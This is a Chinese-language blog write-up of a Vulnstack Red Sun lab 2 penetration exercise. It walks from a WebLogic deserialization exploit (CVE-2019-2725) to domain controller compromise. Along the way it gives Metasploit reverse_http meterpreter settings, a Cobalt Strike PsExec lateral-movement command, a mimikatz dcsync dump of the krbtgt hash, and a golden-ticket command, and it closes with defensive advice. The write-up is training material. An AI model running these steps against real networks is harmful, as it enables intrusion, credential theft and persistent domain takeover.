从WebLogic漏洞到域控沦陷:一次完整的Vulnstack红日靶场2内网渗透实战复盘

发布时间:2026/7/2 8:17:30

从WebLogic漏洞到域控沦陷:一次完整的Vulnstack红日靶场2内网渗透实战复盘 从WebLogic漏洞到域控沦陷一次完整的Vulnstack红日靶场2内网渗透实战复盘当安全工程师第一次接触内网渗透时往往会被各种工具和概念淹没。本文将以攻击者视角还原一次完整的红日靶场2渗透过程重点剖析攻击链的设计思路与技术原理而非简单的操作步骤复现。1. 攻击前的战略思考任何成功的渗透都始于充分的信息收集。在本次靶场环境中我们首先通过Nmap扫描发现192.168.111.80开放了7001端口——这是WebLogic的默认管理端口。选择WebLogic作为突破口基于三个考量攻击面大WebLogic历史漏洞多特别是反序列化漏洞权限高中间件通常以较高权限运行网络位置作为外网暴露的服务是理想的初始入口在实际攻防中攻击者往往会优先寻找Web服务、邮件系统等对外暴露的入口点我们使用如下命令进行初步探测nmap -sV -p 7001 192.168.111.80扫描结果确认了WebLogic版本结合公开漏洞数据库我们锁定了CVE-2019-2725这个反序列化漏洞。2. 初始突破WebLogic漏洞利用的艺术选择Metasploit作为攻击工具并非偶然。对于WebLogic这类Java中间件MSF提供了成熟的攻击模块和稳定的payload生成机制。特别值得注意的是目标设置set target 1 # Windows目标 set payload windows/meterpreter/reverse_http # HTTP协议穿透性更好这里有几个关键决策点协议选择HTTP相比TCP更容易穿透防火墙会话稳定性Meterpreter提供了丰富的后期利用功能规避检测反序列化攻击本身难以被传统杀软检测成功获取shell后我们立即将会话派发给Cobalt Strike。这个转换基于以下考虑工具优势局限性Metasploit漏洞利用成熟横向移动功能有限Cobalt Strike团队协作方便后渗透功能强大学习曲线较陡3. 横向移动内网渗透的核心战役获得WEB主机权限后我们开始内网侦察。关键发现包括内网网段为10.10.10.0/24存在三台主机WEB(10.10.10.80)、PC(10.10.10.201)、DC(10.10.10.10)所有主机都开放了445端口(SMB)横向移动策略选择矩阵PsExec优点直接有效风险会产生明显日志WMI优点更隐蔽限制需要管理员凭据计划任务优点可定时执行限制需要权限较高我们最终选择PsExec因为已获取域管理员凭据靶场环境对隐蔽性要求不高执行速度快便于演示实际操作中使用的关键命令beacon psexec \\10.10.10.10 smb4. 权限维持黄金票据的实战应用获取域控权限后我们尝试制作黄金票据。这是整个过程中最具技术深度的部分。krbtgt账户的NTLM hash是制作黄金票据的关键mimikatz # lsadump::dcsync /domain:redteam.local /user:krbtgt获取到以下关键信息krbtgt hash: a9b30e5b0d2a81d890fd1f83fc8f1d7b域SID: S-1-5-21-2756371121-2868759905-3853650604制作黄金票据的命令mimikatz # kerberos::golden /user:Administrator /domain:redteam.local /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:a9b30e5b0d2a81d890fd1f83fc8f1d7b /ptt在实际测试中遇到的黄金票据访问失败问题可能原因包括票据有效期设置不当系统时间不同步目标服务票据验证策略严格网络策略限制替代方案可以考虑白银票据服务特定万能密码需要域控权限影子凭证更隐蔽5. 攻击链优化与防御思考回顾整个攻击过程有几个关键节点值得深入探讨攻击链优化点初始入口尝试多个WebLogic漏洞模块结合SSRF等漏洞扩大攻击面横向移动使用更隐蔽的WMI执行尝试基于HTTP的横向移动方式权限维持同时部署多个持久化机制结合计划任务和启动项防御建议WebLogic防护及时安装补丁限制管理控制台访问启用详细日志记录内网防护网络分段隔离禁用不必要的SMB服务监控异常PsExec活动域控保护定期更改krbtgt密码实施LSA保护监控DC同步请求在内网渗透中理解每个操作背后的原理比记住具体命令更重要。一次成功的渗透是技术、策略和耐心的结合。

相关新闻